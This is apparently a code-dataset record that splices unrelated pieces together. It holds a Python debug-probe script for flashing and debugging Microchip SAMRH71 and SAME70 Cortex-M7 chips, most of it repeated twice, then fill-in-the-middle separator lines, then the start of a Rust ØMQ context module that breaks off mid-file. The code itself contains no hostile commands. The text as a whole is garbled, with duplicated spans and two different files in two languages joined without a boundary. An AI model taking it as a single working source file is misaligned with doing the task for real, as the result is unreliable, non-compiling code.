def set_var_factor_and_power_toggle_flash(): # only for SAMRH71, probably only needed for rev 2.0 boards
# reset problem for flash (for rev 2.0 of device), can read flash only every second reset
# without this workaround
dev.Write32(efc_fpmr, 0x00013F0F) # set var factor at 0x3F 1111
dev.Write32(efc_fpmr, 0x00013F0E) # Power OFF flash 1110
dev.Write32(efc_fpmr, 0x00003F0D) # Power ON flash 1101
def initialize_PC_SP(): # only for SAMRH71, probably only needed for rev 2.0 boards
log.info("Initialize PC and SP (should be done by core, problem in SAMRH71F20-EK board rev 2.0)")
reset_handler = dev.Read32(0x10000004)
old_pc = get_pc()
pc_different = old_pc != (reset_handler & 0xFFFFFFFE)
stack_pointer = dev.Read32(0x10000000)
old_sp = get_sp()
sp_different = old_sp != stack_pointer
if pc_different and reset_handler != 0xFFFFFFFF: # only if not flash is erased
set_pc(reset_handler)
# Correct EPSR T bit in case core didn't initialize PC and T bit correctly (if PC bit 0 is set, then set T bit)
psr = dev.ReadReg64(16)
if reset_handler & 1 and not psr & 0x01000000:
log.error("PC initialization by core failed, corrected 0x%X -> 0x%X and set EPSR T bit" % (old_pc, get_pc()))
dev.WriteReg64(16, psr | 0x01000000)
else:
log.error("PC initialization by core failed, corrected 0x%X -> 0x%X" % (old_pc, get_pc()))
if sp_different and stack_pointer != 0xFFFFFFFF: # only if not flash is erased
set_sp(stack_pointer)
log.error("SP initialization by core failed, corrected 0x%X -> 0x%X" % (old_sp, get_sp()))
def hold_in_reset():#mplab
log.info("Prog: Hold in reset")
dev.Connect(comm_iface, comm_speed)
reset_and_halt()
dev.Disconnect()
def release_from_reset():#mplab
log.info("Prog: Release from reset")
# toggle reset line
dev.Pins(0,dev.RESET,1000)
if "RH71" in device and rh71_2_0_workaround_reset_30ms_delay:
dev.Delay(30000) # add 30ms delay holding reset low, needed for SAMRH71 board rev 2.0
dev.Pins(dev.RESET,dev.RESET,1000) # now float reset back
# workaround if reset line is not connected on board
# dev.Write32(dev.AIRCR, 0x05fa0004) # VECTKEY | SYSRESETREQ
def write_flash_page(adr, ofs, data):
log.info("Write flash page adr=0x%0x, ofs=0x%0x" % (adr, ofs))
dev.Write(adr, data, ofs, PAGE_SIZE)
# Remove flash offset, if any, and mask away page internal address bits.
# Position page_number in the FARG bitfield in EFC_FCR
if "RH71" in device:
page_number = adr & 0x3fff00 # SAMRH71 has page_size 256
else:
page_number = (adr & 0x3ffe00)/2 # Canopus has page_size 512
dev.Write32(efc_fcr, efc_cmd_wp | page_number)
waitForFlashReady()
log.info("Written page %d (0x%0x) at 0x%0x" %
(page_number/256, page_number*2, adr))
def prog_write(type_of_mem, address, length, data):#mplab
log.info("Prog: Writing %d bytes to address 0x%0x of %s memory" % (length, address, type_of_mem))
if str(type_of_mem) == "Cfg":
# Converting value to indexing access, and writing one GPNVM bit at the time
mask = GPNVM_BIT_MASK # Use mask to avoid writing to reserved bits
bit_index = 0
for val in data:
for bit in bitsInByte(val):
if(mask & 0x01):
if(bit == 1):
log.info("Debug:: Setting GPNVM bit %d" % bit_index)
dev.Write32(efc_fcr,
efc_cmd_sgpb | (bit_index << 8))
waitForFlashReady()
else:
log.info("Debug:: Clearing GPNVM bit %d" % bit_index)
dev.Write32(efc_fcr,
efc_cmd_cgpb | (bit_index << 8))
waitForFlashReady()
mask = mask >> 1
if not mask:
return
bit_index += 1
return # This should never be reached...
elif str(type_of_mem) != "Pgm":
log.warning(
"Debug:: Currently not supporting writing to memory type %s" % type_of_mem)
return
if is_target_running():
log.error("Error: Target is running when it should be halted")
halt_or_raise()
if "RH71" not in device: # SAMRH71 don't support wait states (ref prelim data sheet)
# Set Flash Wait States to 7 cycles (6+1)
dev.Write32(efc_fmr, 0x00000600)
written = 0
while written < length:
write_flash_page(address, written, data)
written += PAGE_SIZE
address += PAGE_SIZE
def prog_read(type_of_mem, address, length, data):#mplab
log.info("Prog: Reading %d bytes from address 0x%0x of %s memory..." % (length, address, type_of_mem))
global need_reset_for_read_operations
if need_reset_for_read_operations:
reset_and_halt() # necessary for reading flash with specific projects, ref MPLABX-4516
need_reset_for_read_operations = False
global did_read_operation
did_read_operation = True
if str(type_of_mem) == "Cfg":
gpnvm_address = address & 0x1F
dev.Write32(efc_fcr, efc_cmd_ggpb)
read_index = 0
data_index = 0
read_data = 0
while read_index < (gpnvm_address + length):
if read_index % 4 == 0:
read_data = dev.Read32(efc_frr)
log.info("Debug:: GPNVM at address 0x%0X, value: 0x%0X" %
(address, read_data))
if read_index >= gpnvm_address:
data[data_index] = 0xFF & read_data
data_index += 1
read_data = read_data >> 8
read_index += 1
return
dev.Read(address, data, 0, length)
def verify_transfer(type_of_mem, address, data, length):#mplab
log.info("Prog: not implemented: Verifying %d bytes to address 0x%0x of %s memory" % (length, address, type_of_mem))
def end_of_operations():#mplab
log.info("Prog: End of operations")
if was_running and did_read_operation:
if flash_strategy == 0:
run_target()
if flash_strategy == 1:
log.info("Target was running and we did prog_read, release it now")
release_from_reset()
dev.Disconnect()
global g_is_running
g_is_running = True
def begin_debug_session():#mplab
log.info("Debug:: Begin debug session")
dev.Connect(comm_iface, comm_speed)
reset_and_halt()
def debug_read(mem_type, start, length, data):#mplab
log.info("Debug: Reading %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Read(start, data, 0, length)
def debug_write(mem_type, start, length, data):#mplab
log.info("Debug: Writing %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Write(start, data, 0, length)
def get_pc():#mplab
return dev.ReadReg64(arm.PC)
def get_sp():
return dev.ReadReg64(arm.SP)
def run_target():#mplab
log.info("Debug: Run target")
dev.Write32(arm.DHCSR, 0xa05f0001) # DBGKEY|C_DEBUGEN
def halt_target():#mplab
log.info("Debug: Halt target")
#print_DHCSR("Target to be halted ")
dev.Write32(arm.DHCSR, 0xa05f0003) # DBGKEY|C_HALT|C_DEBUGEN
def step_target():#mplab
log.info("Debug: Stepping at pc 0x%0x" % get_pc())
#get_pc()
dev.Write32(arm.DHCSR, 0xa05f000b) #DBGKEY | C_DEBUGEN | C_HALT | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f000d) #DBGKEY | C_DEBUGEN | C_STEP | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f0003) #DBGKEY | C_DEBUGEN | C_HALT
def set_pc(pc):#mplab
log.info("Debug: Set pc to 0x%0x" % pc)
dev.WriteReg64(arm.PC,pc)
def set_sp(sp):
log.info("Debug: Set sp to 0x%0x" % sp)
dev.WriteReg64(arm.SP, sp)
def set_sw_bp(address, instruction, flags):
"""
* Sets/clears a software breakpoint
* @param address -> the address of the software breakpoint
* @param instruction -> the instruction to be programmed (either the software breakpoint
* opcode or the original instruction the software breakopint was replacing).
* @param flags -> One or more of the SWBPFlags listed below
* @return returns the original/old opcode at address
"""
log.info("Debug:: set/remove bp at address 0x%0x, instructions 0x%0x, flags = 0x%0x" % (
address, instruction, flags))
# Accept addressing both from FLASH_START and from 0x0
addr = address & (FLASH_START-1)
single_page_access = False
buffer_size = PAGE_SIZE * 16
# Canopus: single page read-modify-write is possible within the first 16kb of flash.
# SAMRH71: single page read-modify-write is possible in whole flash.
if addr < 16384 or "RH71" in device:
buffer_size = PAGE_SIZE
single_page_access = True
buffer_mask = long(buffer_size-1)
data_buffer = bytearray(buffer_size)
# Get the start address to the flash page(es) we need to erase
start_addr = addr & ~(buffer_mask)
absolute_start_addr = address & ~(buffer_mask)
# Get BP address within the buffer
bp_addr = addr & buffer_mask
prog_read("pgm", absolute_start_addr, buffer_size, data_buffer)
org_inst = 0
n = 0
# Replace instruction in data_buffer
while(n < 2):
org_inst += data_buffer[bp_addr+n] << (n*8)
data_buffer[bp_addr+n] = ((instruction >> (n*8)) & 0xff)
n = n+1
if single_page_access:
if "RH71" in device:
# Remove flash offset, if any, and mask away page internal address bits.
# FARG bitfield in EFC_FCR
page_number = addr & 0x3fff00 # SAMRH71 has page_size 256
# Erase and write page (two separate commands on SAMRH71)
dev.Write32(efc_fcr, efc_cmd_ep | page_number)
waitForFlashReady()
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
dev.Write32(efc_fcr, efc_cmd_wp | page_number)
waitForFlashReady()
else:
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
# Remove flash offset, if any, and mask away page internal address bits.
# Then shift right once to position page_number in the FARG bitfield in EFC_FCR
page_number = (addr & 0x3ffe00)/2 # Canopus has page_size 512
# Erase and write page (one single command on Canopus)
dev.Write32(efc_fcr, efc_cmd_ewp | page_number)
waitForFlashReady()
else:
# Erase 16 pages (16pages == buffer_size). The "0x200" sets the number of pages to erase.
dev.Write32(efc_fcr, efc_cmd_epa | (start_addr >> 1) | 0x200)
waitForFlashReady()
prog_write("Pgm", absolute_start_addr, buffer_size, data_buffer)
return org_inst
def reset_target():#mplab
reset_and_halt()
def is_target_running():#mplab
global g_is_running
dhcsr = dev.Read32(arm.DHCSR)
state = 0 == (dhcsr & 0x20000) # S_HALT
if state != g_is_running:
log.info("Debug: Changed running state to %s" % state)
g_is_running = state
return g_is_running
def end_debug_session():#mplab
dev.Disconnect()
| was_running = True
halt_or_raise() | conditional_block |
dap_cortex-m7.py | efc_cmd_getd = 0x5a000000
efc_cmd_wp = 0x5a000001
efc_cmd_wpl = 0x5a000002
efc_cmd_ea = 0x5a000005
efc_cmd_epa = 0x5a000007
efc_cmd_slb = 0x5a000008
efc_cmd_clb = 0x5a000009
efc_cmd_glb = 0x5a00000A
efc_cmd_sgpb = 0x5a00000B
efc_cmd_cgpb = 0x5a00000C
efc_cmd_ggpb = 0x5a00000D
if "RH71" in device:
FLASH_START = 0x10000000
PAGE_SIZE = 256
GPNVM_BIT_MASK = 0x2 # Bit mask for user changeable GPNVM bits
efc_fmr = 0x40004000 # HEFC Flash Mode Register
efc_fcr = 0x40004004 # HEFC Flash Command Register
efc_fsr = 0x40004008 # HEFC Flash Status Register
efc_frr = 0x4000400c # HEFC Flash Result Register
efc_fpmr = 0x40004040 # HEFC Flash Power Management Register
efc_wpmr = 0x400040e4 # HEFC Write Protection Mode Register
efc_cmd_ep = 0x5a000006 # available on SAMRH71, but not available on Canopus (SAME70, S70, V70/71)
rstc_cr = 0x40100200
rstc_sr = 0x40100204
rstc_mr = 0x40100208
else:
FLASH_START = 0x0400000
PAGE_SIZE = 512
GPNVM_BIT_MASK = 0x183 # Bit mask for user changeable GPNVM bits
efc_fmr = 0x400e0c00 # EEFC Flash Mode Register
efc_fcr = 0x400e0c04 # EEFC Flash Command Register
efc_fsr = 0x400e0c08 # EEFC Flash Status Register
efc_frr = 0x400e0c0c # EEFC Flash Result Register
efc_wpmr = 0x400e0ce4 # EEFC Write Protection Mode Register
efc_cmd_ewp = 0x5a000003 # available on Canopus (SAME70, S70, V70/71), but not available on SAMRH71
efc_cmd_ewpl = 0x5a000004 # available on Canopus (SAME70, S70, V70/71), but not available on SAMRH71
rstc_cr = 0x400e1800
rstc_sr = 0x400e1804
rstc_mr = 0x400e1808
# Flash strategy
# 0: Halt before programming/read mem operations, run afterwards
# 1: Reset and halt before programming/read mem operations, release from reset afterwards
if "RH71" in device:
flash_strategy = 0
else:
flash_strategy = 1
was_running = False
did_read_operation = False
need_reset_for_read_operations = False
# Workarounds for flash bank startup after reset problems with SAMRH71F20-EK board rev 2.0
rh71_2_0_workaround_VAR_factor = True
rh71_2_0_workaround_init_PC_SP = True
rh71_2_0_workaround_reset_30ms_delay = True
def begin_communication_session():
dev.SetApiLogging(1)
log.setShowOutput(False)
global comm_iface, comm_speed
try:
comm_iface = True if settings["communication.interface"].lower()=="swd" else False
comm_speed = 8000000 if settings["communication.autoselectspeed"] else settings["communication.frequency"]
except:
comm_iface = True
comm_speed = 8000000
def begin_programming_operation():
log.info("begin_programming_operation, interface: %s, freq: %d" % ("SWD" if comm_iface else "JTAG", comm_speed))
dev.Connect(comm_iface, comm_speed)
global was_running
was_running = False
global did_read_operation
did_read_operation = False
if is_target_running():
was_running = True
halt_or_raise()
global need_reset_for_read_operations
need_reset_for_read_operations = True if flash_strategy == 1 else False
def bitsInByte(byteValue):
for i in xrange(8):
yield (byteValue >> i) & 1
def log_efc_fsr_error(fsr):
err_string = ""
if fsr & 0x00080000: # FSR_MECCEMSB
err_string = "MECCEMSB"
if fsr & 0x00040000: # FSR_UECCEMSB
err_string += " UECCEMSB"
if fsr & 0x00020000: # FSR_MECCELSB
err_string += " MECCELSB"
if fsr & 0x00010000: # FSR_UECCELSB
err_string += " UECCELSB"
if fsr & 0x10: # FSR_WREER
err_string += " WREER"
if fsr & 8: # FSR_FLERR
err_string += " FLERR"
if fsr & 4: # FSR_FLOCKE
err_string += " FLOCKE"
if fsr & 2: # FSR_FCMDE
err_string += " FCMDE"
if err_string == "":
return
err_string = err_string + (" from the flash controller after command 0x%0x" % (dev.Read32(efc_fcr)))
log.error(err_string)
def waitForFlashReady():
n = 0
max_retries = 100
while n < max_retries:
r = dev.Read32(efc_fsr)
log_efc_fsr_error(r)
if r & 1: # FSR_FRDY:
break
dev.Delay(100000) # 100ms
n = n+1
if n == max_retries:
raise Exception("Timeout waiting for flash ready")
def halt_or_raise():
halt_target()
n = 0
while n < 100:
if not is_target_running():
return
dev.Delay(100000) # 100ms
n = n+1
raise Exception("Failed to halt target!")
def resetPeripheralsWithRstc():
dev.Write32(rstc_mr, 0xa5000b00) # long(RSTC_KEY) | rstc_erstl)
dev.Write32(rstc_cr, 0xa5000001) # long(RSTC_KEY) | PROCRST)
n = 0
max_retries = 100
while n < max_retries:
dev.Delay(10000) # 10ms
r = dev.Read32(rstc_sr)
if r & 0x00020000: # SRCMP
continue # Software reset in progress
if r & 0x00010000: # NRSTL
break
n = n+1
if n == max_retries:
raise Exception("timeout in reset")
dev.Write32(rstc_mr, 0xa5000001) # long(RSTC_KEY) | URSTEN) # Enable user reset again (URSTEN == 1)
def blank_check(): #mplab
log.info("Prog: Blank check")
def erase():#mplab
log.info("Prog: Erase")
reset_and_halt()
dev.Write32(efc_fcr, efc_cmd_ea)
#log.info("Issued Erase All, wait for flash ready")
waitForFlashReady()
def reset_and_halt():
log.info("Prog: Reset and halt")
# check run state and clear S_RESET_ST so that we can use it to detect end of reset later
if is_target_running():
halt_or_raise()
dev.Write32(arm.DEMCR, 0x01000001) # TRCENA | VC_CORERESET)
if "RH71" in device:
# SAMRH71 use SYSRESETREQ to reset core + peripherals, will loose connection so need to reconnect.
try:
dev.Write32(arm.AIRCR, 0x05fa0004) # VECTKEY | SYSRESETREQ) # 1=VECTRESET 4=SYSRESETREQ
except:
log.info("Reset with SYSRESETREQ, lost connection, try to reconnect to the device")
dev.Disconnect()
dev.Connect(comm_iface, comm_speed)
else:
# Canopus use RSTC (PROCRST) to reset peripherals and VECTRESET to reset core.
resetPeripheralsWithRstc()
dev.Write32(arm.AIRCR, 0x05fa0001) # VECTKEY | VECTRESET) # 1=VECTRESET 4=SYSRESETREQ
n = 0
max_retries = 100
seenReset = False
while n < max_retries:
dhcsr = dev.Read32(arm.DHCSR)
log.info("S_RESET_ST = %s / %s at PC = %X" % ("1" if dhcsr & 0x02000000 else "0", "Halted" if dhcsr & 0x20000 else "RUNNING", get_pc()))
if (dhcsr & 0x02000000): # wait for S_RESET_ST
seenReset = True
hasHalted = 0 != (dhcsr & 0x20000) # S_HALT
if seenReset:
if hasHalted: # wait for S_HALT
break
dev.Delay(100000) # 100ms
n = n+1
dev.Write32(dev.DEMCR, 0x01000000) # TRCENA reset VC_CORERESET bit
if n == max_retries:
raise Exception("timeout in reset")
if "RH71" in device:
initialize_HEFC()
def initialize_HEFC(): # only for SAMRH71
log.info("Prog: initialize_HEFC")
# set up GCLK for HEFC
dev.Write32(0x40100254, 0x00008000) # disable watchdog wdt_mr
dev.Write32(0x4000C020, 0x00370028) # Set internal RC 10 MHz ckgr_mor
dev.Write32(0x4000C10C, 0x30401432) # Set GCLK with div 5 pmc_pcr
if rh71_2_0_workaround_VAR_factor:
set_var_factor_and_power_toggle_flash()
#waitForPWSReady
n = 0
max_retries = 100
while n < max_retries:
r = dev.Read32(efc_fpmr)
if r & 2: # PWS_STAT
dev.Delay(250000) # wait 250ms after seeing PWS_STAT bit
break
dev.Delay(100000) # 100ms
n = n+1
if n == max_retries:
raise Exception("Timeout waiting for PWS ready")
if rh71_2_0_workaround_init_PC_SP:
initialize_PC_SP()
def set_var_factor_and_power_toggle_flash(): # only for SAMRH71, probably only needed for rev 2.0 boards
# reset problem for flash (for rev 2.0 of device), can read flash only every second reset
# without this workaround
dev.Write32(efc_fpmr, 0x00013F0F) # set var factor at 0x3F 1111
dev.Write32(efc_fpmr, 0x00013F0E) # Power OFF flash 1110
dev.Write32(efc_fpmr, 0x00003F0D) # Power ON flash 1101
def initialize_PC_SP(): # only for SAMRH71, probably only needed for rev 2.0 boards
log.info("Initialize PC and SP (should be done by core, problem in SAMRH71F20-EK board rev 2.0)")
reset_handler = dev.Read32(0x10000004)
old_pc = get_pc()
pc_different = old_pc != (reset_handler & 0xFFFFFFFE)
stack_pointer = dev.Read32(0x10000000)
old_sp = get_sp()
sp_different = old_sp != stack_pointer
if pc_different and reset_handler != 0xFFFFFFFF: # only if not flash is erased
set_pc(reset_handler)
# Correct EPSR T bit in case core didn't initialize PC and T bit correctly (if PC bit 0 is set, then set T bit)
psr = dev.ReadReg64(16)
if reset_handler & 1 and not psr & 0x01000000:
log.error("PC initialization by core failed, corrected 0x%X -> 0x%X and set EPSR T bit" % (old_pc, get_pc()))
dev.WriteReg64(16, psr | 0x01000000)
else:
log.error("PC initialization by core failed, corrected 0x%X -> 0x%X" % (old_pc, get_pc()))
if sp_different and stack_pointer != 0xFFFFFFFF: # only if not flash is erased
set_sp(stack_pointer)
log.error("SP initialization by core failed, corrected 0x%X -> 0x%X" % (old_sp, get_sp()))
def hold_in_reset():#mplab
log.info("Prog: Hold in reset")
dev.Connect(comm_iface, comm_speed)
reset_and_halt()
dev.Disconnect()
def release_from_reset():#mplab
log.info("Prog: Release from reset")
# toggle reset line
dev.Pins(0,dev.RESET,1000)
if "RH71" in device and rh71_2_0_workaround_reset_30ms_delay:
dev.Delay(30000) # add 30ms delay holding reset low, needed for SAMRH71 board rev 2.0
dev.Pins(dev.RESET,dev.RESET,1000) # now float reset back
# workaround if reset line is not connected on board
# dev.Write32(dev.AIRCR, 0x05fa0004) # VECTKEY | SYSRESETREQ
def write_flash_page(adr, ofs, data):
log.info("Write flash page adr=0x%0x, ofs=0x%0x" % (adr, ofs))
dev.Write(adr, data, ofs, PAGE_SIZE)
# Remove flash offset, if any, and mask away page internal address bits.
# Position page_number in the FARG bitfield in EFC_FCR
if "RH71" in device:
page_number = adr & 0x3fff00 # SAMRH71 has page_size 256
else:
page_number = (adr & 0x3ffe00)/2 # Canopus has page_size 512
dev.Write32(efc_fcr, efc_cmd_wp | page_number)
waitForFlashReady()
log.info("Written page %d (0x%0x) at 0x%0x" %
(page_number/256, page_number*2, adr))
def prog_write(type_of_mem, address, length, data):#mplab
log.info("Prog: Writing %d bytes to address 0x%0x of %s memory" % (length, address, type_of_mem))
if str(type_of_mem) == "Cfg":
# Converting value to indexing access, and writing one GPNVM bit at the time
mask = GPNVM_BIT_MASK # Use mask to avoid writing to reserved bits
bit_index = 0
for val in data:
for bit in bitsInByte(val):
if(mask & 0x01):
if(bit == 1):
log.info("Debug:: Setting GPNVM bit %d" % bit_index)
dev.Write32(efc_fcr,
efc_cmd_sgpb | (bit_index << 8))
waitForFlashReady()
else:
log.info("Debug:: Clearing GPNVM bit %d" % bit_index)
dev.Write32(efc_fcr,
efc_cmd_cgpb | (bit_index << 8))
waitForFlashReady()
mask = mask >> 1
if not mask:
return
bit_index += 1
return # This should never be reached...
elif str(type_of_mem) != "Pgm":
log.warning(
"Debug:: Currently not supporting writing to memory type %s" % type_of_mem)
return
if is_target_running():
log.error("Error: Target is running when it should be halted")
halt_or_raise()
if "RH71" not in device: # SAMRH71 don't support wait states (ref prelim data sheet)
# Set Flash Wait States to 7 cycles (6+1)
dev.Write32(efc_fmr, 0x00000600)
written = 0
while written < length:
write_flash_page(address, written, data)
written += PAGE_SIZE
address += PAGE_SIZE
def prog_read(type_of_mem, address, length, data):#mplab
log.info("Prog: Reading %d bytes from address 0x%0x of %s memory..." % (length, address, type_of_mem))
global need_reset_for_read_operations
if need_reset_for_read_operations:
reset_and_halt() # necessary for reading flash with specific projects, ref MPLABX-4516
need_reset_for_read_operations = False
global did_read_operation
did_read_operation = True
if str(type_of_mem) == "Cfg":
gpnvm_address = address & 0x1F
dev.Write32(efc_fcr, efc_cmd_ggpb)
read_index = 0
data_index = 0
read_data = 0
while read_index < (gpnvm_address + length):
if read_index % 4 == 0:
read_data = dev.Read32(efc_frr)
log.info("Debug:: GPNVM at address 0x%0X, value: 0x%0X" %
(address, read_data))
if read_index >= gpnvm_address:
data[data_index] = 0xFF & read_data
data_index += 1
read_data = read_data >> 8
read_index += 1
return
dev.Read(address, data, 0, length)
def verify_transfer(type_of_mem, address, data, length):#mplab
log.info("Prog: not implemented: Verifying %d bytes to address 0x%0x of %s memory" % (length, address, type_of_mem))
def end_of_operations():#mplab
log.info("Prog: End of operations")
if was_running and did_read_operation:
if flash_strategy == 0:
run_target()
if flash_strategy == 1:
log.info("Target was running and we did prog_read, release it now")
release_from_reset()
dev.Disconnect()
global g_is_running
g_is_running = True
def begin_debug_session():#mplab
log.info("Debug:: Begin debug session")
dev.Connect(comm_iface, comm_speed)
reset_and_halt()
def debug_read(mem_type, start, length, data):#mplab
log.info("Debug: Reading %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Read(start, data, 0, length)
def debug_write(mem_type, start, length, data):#mplab
log.info("Debug: Writing %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Write(start, data, 0, length)
def get_pc():#mplab
return dev.ReadReg64(arm.PC)
def get_sp():
return dev.ReadReg64(arm.SP)
def run_target():#mplab
log.info("Debug: Run target")
dev.Write32(arm.DHCSR, 0xa05f0001) # DBGKEY|C_DEBUGEN
def halt_target():#mplab
log.info("Debug: Halt target")
#print_DHCSR("Target to be halted ")
dev.Write32(arm.DHCSR, 0xa05f0003) # DBGKEY|C_HALT|C_DEBUGEN
def step_target():#mplab
log.info("Debug: Stepping at pc 0x%0x" % get_pc())
#get_pc()
dev.Write32(arm.DHCSR, 0xa05f000b) #DBGKEY | C_DEBUGEN | C_HALT | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f000d) #DBGKEY | C_DEBUGEN | C_STEP | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f0003) #DBGKEY | C_DEBUGEN | C_HALT
def set_pc(pc):#mplab
log.info("Debug: Set pc to 0x%0x" % pc)
dev.WriteReg64(arm.PC,pc)
def set_sp(sp):
log.info("Debug: Set sp to 0x%0x" % sp)
dev.WriteReg64(arm.SP, sp)
def set_sw_bp(address, instruction, flags):
"""
* Sets/clears a software breakpoint
* @param address -> the address of the software breakpoint
* @param instruction -> the instruction to be programmed (either the software breakpoint
* opcode or the original instruction the software breakopint was replacing).
* @param flags -> One or more of the SWBPFlags listed below
* @return returns the original/old opcode at address
"""
log.info("Debug:: set/remove bp at address 0x%0x, instructions 0x%0x, flags = 0x%0x" % (
address, instruction, flags))
# Accept addressing both from FLASH_START and from 0x0
addr = address & (FLASH_START-1)
single_page_access = False
buffer_size = PAGE_SIZE * 16
# Canopus: single page read-modify-write is possible within the first 16kb of flash.
# SAMRH71: single page read-modify-write is possible in whole flash.
if addr < 16384 or "RH71" in device:
buffer_size = PAGE_SIZE
single_page_access = True
buffer_mask = long(buffer_size-1)
data_buffer = bytearray(buffer_size)
# Get the start address to the flash page(es) we need to erase
start_addr = addr & ~(buffer_mask)
absolute_start_addr = address & ~(buffer_mask)
# Get BP address within the buffer
bp_addr = addr & buffer_mask
prog_read("pgm", absolute_start_addr, buffer_size, data_buffer)
org_inst = 0
n = 0
# Replace instruction in data_buffer
while(n < 2):
org_inst += data_buffer[bp_addr+n] << (n*8)
data_buffer[bp_addr+n] = ((instruction >> (n*8)) & 0xff)
n = n+1
if single_page_access:
if "RH71" in device:
# Remove flash offset, if any, and mask away page internal address bits.
# FARG bitfield in EFC_FCR
page_number = addr & 0x3fff00 # SAMRH71 has page_size 256
# Erase and write page (two separate commands on SAMRH71)
dev.Write32(efc_fcr, efc_cmd_ep | page_number)
waitForFlashReady()
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
dev.Write32(efc_fcr, efc_cmd_wp | page_number)
waitForFlashReady()
else:
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
# Remove flash offset, if any, and mask away page internal address bits.
# Then shift right once to position page_number in the FARG bitfield in EFC_FCR
page_number = (addr & 0x3ffe00)/2 # Canopus has page_size 512
# Erase and write page (one single command on Canopus)
dev.Write32(efc_fcr, efc_cmd_ewp | page_number)
waitForFlashReady()
else:
# Erase 16 pages (16pages == buffer_size). The "0x200" sets the number of pages to erase.
dev.Write32(efc_fcr, efc_cmd_epa | (start_addr >> 1) | 0x200)
waitForFlashReady()
prog_write("Pgm", absolute_start_addr, buffer_size, data_buffer)
return org_inst
def reset_target():#mplab
reset_and_halt()
def is_target_running():#mplab
global g_is_running
dhcsr = dev.Read32(arm.DHCSR)
state = 0 == (dhcsr & 0x20000) # S_HALT
if state != g_is_running:
log.info("Debug: Changed running state to %s" % state)
g_is_running = state
return g_is_running
def end_debug_session():#mplab | dev.Disconnect() | random_line_split |
|
ctx.rs | //! The ØMQ context type.
use crate::{auth::server::AuthServer, error::*};
use libzmq_sys as sys;
use sys::errno;
use lazy_static::lazy_static;
use serde::{Deserialize, Serialize};
use std::{
os::raw::{c_int, c_void},
ptr, str,
sync::Arc,
thread,
};
lazy_static! {
static ref GLOBAL_CONTEXT: Ctx = Ctx::new();
}
#[derive(Copy, Clone, Debug)]
enum RawCtxOption {
IOThreads,
MaxSockets,
MaxMsgSize,
SocketLimit,
IPV6,
Blocky,
}
impl From<RawCtxOption> for c_int {
fn from(r: RawCtxOption) -> c_int {
match r {
RawCtxOption::IOThreads => sys::ZMQ_IO_THREADS as c_int,
RawCtxOption::MaxSockets => sys::ZMQ_MAX_SOCKETS as c_int,
RawCtxOption::MaxMsgSize => sys::ZMQ_MAX_MSGSZ as c_int,
RawCtxOption::SocketLimit => sys::ZMQ_SOCKET_LIMIT as c_int,
RawCtxOption::IPV6 => sys::ZMQ_IPV6 as c_int,
RawCtxOption::Blocky => sys::ZMQ_BLOCKY as c_int,
}
}
}
#[derive(Debug)]
struct RawCtx {
ctx: *mut c_void,
}
impl RawCtx {
fn get(&self, option: RawCtxOption) -> i32 {
unsafe { sys::zmq_ctx_get(self.ctx, option.into()) }
}
fn set(&self, option: RawCtxOption, value: i32) -> Result<(), Error> {
let rc = unsafe { sys::zmq_ctx_set(self.ctx, option.into(), value) };
if rc == -1 {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINVAL => Err(Error::new(ErrorKind::InvalidInput {
msg: "invalid value",
})),
_ => panic!(msg_from_errno(errno)),
}
} else {
Ok(())
}
}
fn set_bool(&self, opt: RawCtxOption, flag: bool) -> Result<(), Error> {
self.set(opt, flag as i32)
}
fn get_bool(&self, opt: RawCtxOption) -> bool {
let flag = self.get(opt);
flag != 0
}
fn terminate(&self) {
// We loop in case `zmq_ctx_term` get interrupted by a signal.
loop {
let rc = unsafe { sys::zmq_ctx_term(self.ctx) };
if rc == 0 {
break;
} else {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINTR => (),
_ => unreachable!(),
}
}
}
}
fn shutdown(&self) {
let rc = unsafe { sys::zmq_ctx_shutdown(self.ctx) };
// Should never fail.
assert_eq!(rc, 0);
}
}
// The `zmq_ctx` is internally threadsafe.
unsafe impl Send for RawCtx {}
unsafe impl Sync for RawCtx {}
impl Drop for RawCtx {
fn drop(&mut self) {
self.terminate()
}
}
impl PartialEq for RawCtx {
/// Compares the two underlying raw C pointers.
fn eq(&self, other: &Self) -> bool {
ptr::eq(self.ctx, other.ctx)
}
}
impl Eq for RawCtx {}
impl Default for RawCtx {
fn default() -> Self {
let ctx = unsafe { sys::zmq_ctx_new() };
if ctx.is_null() {
panic!(msg_from_errno(unsafe { sys::zmq_errno() }));
}
Self { ctx }
}
}
/// A config for a [`Ctx`].
///
/// Usefull in configuration files.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxConfig {
io_threads: Option<i32>,
max_msg_size: Option<i32>,
max_sockets: Option<i32>,
no_linger: Option<bool>,
}
impl CtxConfig {
pub fn new() -> Self {
Self::default()
}
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
if let Some(value) = self.io_threads {
ctx.set_io_threads(value)?;
}
if let Some(value) = self.max_sockets {
ctx.set_max_sockets(value)?;
}
if let Some(value) = self.max_msg_size {
ctx.set_max_msg_size(value)?;
}
if let Some(value) = self.no_linger {
ctx.set_no_linger(value)?;
}
Ok(())
}
pub fn io_threads(&self) -> Option<i32> {
self.io_threads
}
pub fn set_io_threads(&mut self, value: Option<i32>) {
self.io_threads = value;
}
pub fn max_msg_size(&self) -> Option<i32> {
self.max_msg_size
}
pub fn set_max_msg_size(&mut self, value: Option<i32>) {
self.max_msg_size = value;
}
pub fn max_sockets(&mut self) -> Option<i32> {
self.max_sockets
}
pub fn set_max_sockets(&mut self, value: Option<i32>) {
self.max_sockets = value;
}
pub fn no_linger(&self) -> Option<bool> {
self.no_linger
}
pub fn set_no_linger(&mut self, value: Option<bool>) {
self.no_linger = value;
}
}
